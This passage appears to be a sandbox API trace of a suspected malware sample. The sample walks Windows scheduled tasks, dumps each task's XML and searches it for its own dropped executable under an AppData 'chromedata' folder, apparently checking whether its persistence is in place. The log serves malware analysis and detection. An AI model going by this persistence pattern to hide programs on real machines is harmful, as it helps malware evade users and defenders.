<UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{CF2CF428-325B-48D3-8CA8-7633E36E5A32}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.508] IUnknown:Release (This=0x22c10e0) returned 0x0
	[0073.508] IRegisteredTaskCollection:get_Item (in: This=0x55ff20, index=0x128d34*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c10e0) returned 0x0
	[0073.508] IRegisteredTask:get_Name (in: This=0x22c10e0, pName=0x128e3c | out: pName=0x128e3c*="AD RMS Rights Policy Template Management (Manual)") returned 0x0
	[0073.508] IRegisteredTask:get_Xml (in: This=0x22c10e0, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{BF5CB148-7C77-4d8a-A53E-D81C70CF743C}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.510] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2006-11-10T14:29:55.5851926</Date>\r\n    <Author>$(@%systemRoot%\\System32\\msdrm.dll,-6001)</Author>\r\n    <Description>$(@%systemRoot%\\System32\\msdrm.dll,-6003)</Description>\r\n    <URI>\\Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template Management (Manual)</URI>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger id=\"06b3f632-87ad-4ac0-9737-48ea5ddbaf11\">\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1H</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"AllUsers\">\r\n      <GroupId>S-1-1-0</GroupId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>true</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"AllUsers\">\r\n    <ComHandler>\r\n      <ClassId>{BF5CB148-7C77-4d8a-A53E-D81C70CF743C}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.510] IUnknown:Release (This=0x22c10e0) returned 0x0
	[0073.510] IUnknown:Release (This=0x55ff20) returned 0x0
	[0073.510] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55ff20) returned 0x0
	[0073.511] ITaskFolderCollection:get_Count (in: This=0x55ff20, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.511] IUnknown:Release (This=0x55ff20) returned 0x0
	[0073.511] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.511] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x2, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.511] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fec8) returned 0x0
	[0073.511] IRegisteredTaskCollection:get_Count (in: This=0x55fec8, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.511] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.511] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="PolicyConverter") returned 0x0
	[0073.511] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-300)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-301)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-302)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\PolicyConverter</URI>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidpolicyconverter.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.513] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-300)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-301)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-302)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\PolicyConverter</URI>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidpolicyconverter.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.513] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.513] IRegisteredTaskCollection:get_Item (in: This=0x55fec8, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.513] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="VerifiedPublisherCertStoreCheck") returned 0x0
	[0073.513] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-201)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-202)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30M</Delay>\r\n      <Repetition>\r\n        <Interval>PT24H</Interval>\r\n      </Repetition>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>10</Priority>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidcertstorecheck.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.514] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;CI;FA;;;LS)(A;CI;FA;;;S-1-5-80-2078495744-2416903469-4072184685-3943858305-976987417)</SecurityDescriptor>\r\n    <Source>$(@%systemroot%\\system32\\appidsvc.dll,-200)</Source>\r\n    <Author>$(@%systemroot%\\system32\\appidsvc.dll,-201)</Author>\r\n    <Description>$(@%systemroot%\\system32\\appidsvc.dll,-202)</Description>\r\n    <URI>Microsoft\\Windows\\AppID\\VerifiedPublisherCertStoreCheck</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Delay>PT30M</Delay>\r\n      <Repetition>\r\n        <Interval>PT24H</Interval>\r\n      </Repetition>\r\n    </BootTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <Priority>10</Priority>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>false</Enabled>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\appidcertstorecheck.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.515] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.515] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.515] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fec8) returned 0x0
	[0073.515] ITaskFolderCollection:get_Count (in: This=0x55fec8, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.515] IUnknown:Release (This=0x55fec8) returned 0x0
	[0073.515] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
	[0073.515] ITaskFolderCollection:get_Item (in: This=0x55fd98, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x3, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fe58) returned 0x0
	[0073.515] ITaskFolder:GetTasks (in: This=0x55fe58, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe88) returned 0x0
	[0073.516] IRegisteredTaskCollection:get_Count (in: This=0x55fe88, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.516] IRegisteredTaskCollection:get_Item (in: This=0x55fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff90) returned 0x0
	[0073.516] IRegisteredTask:get_Name (in: This=0x55ff90, pName=0x128e3c | out: pName=0x128e3c*="AitAgent") returned 0x0
	[0073.516] IRegisteredTask:get_Xml (in: This=0x55ff90, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\AitAgent</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aitagent.exe,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T02:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT22H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>9</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>aitagent</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.517] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\AitAgent</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aitagent.exe,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aitagent.exe,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T02:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT22H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>9</Priority>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>aitagent</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.517] IUnknown:Release (This=0x55ff90) returned 0x0
	[0073.517] IRegisteredTaskCollection:get_Item (in: This=0x55fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff90) returned 0x0
	[0073.517] IRegisteredTask:get_Name (in: This=0x55ff90, pName=0x128e3c | out: pName=0x128e3c*="ProgramDataUpdater") returned 0x0
	[0073.518] IRegisteredTask:get_Xml (in: This=0x55ff90, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aepdu.dll,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T00:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>4</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>aepdu.dll,AePduRunUpdate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.519] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0</Version>\r\n    <URI>\\Microsoft\\Windows\\Application Experience\\ProgramDataUpdater</URI>\r\n    <SecurityDescriptor>D:(A;;GA;;;BA)(A;;GA;;;SY)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\aepdu.dll,-701)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\aepdu.dll,-702)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2007-10-08T00:30:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>1</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Priority>4</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\rundll32.exe</Command>\r\n      <Arguments>aepdu.dll,AePduRunUpdate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.519] IUnknown:Release (This=0x55ff90) returned 0x0
	[0073.519] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.519] ITaskFolder:GetFolders (in: This=0x55fe58, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe88) returned 0x0
	[0073.520] ITaskFolderCollection:get_Count (in: This=0x55fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.520] IUnknown:Release (This=0x55fe88) returned 0x0
	[0073.520] TaskScheduler:IUnknown:Release (This=0x55fe58) returned 0x0
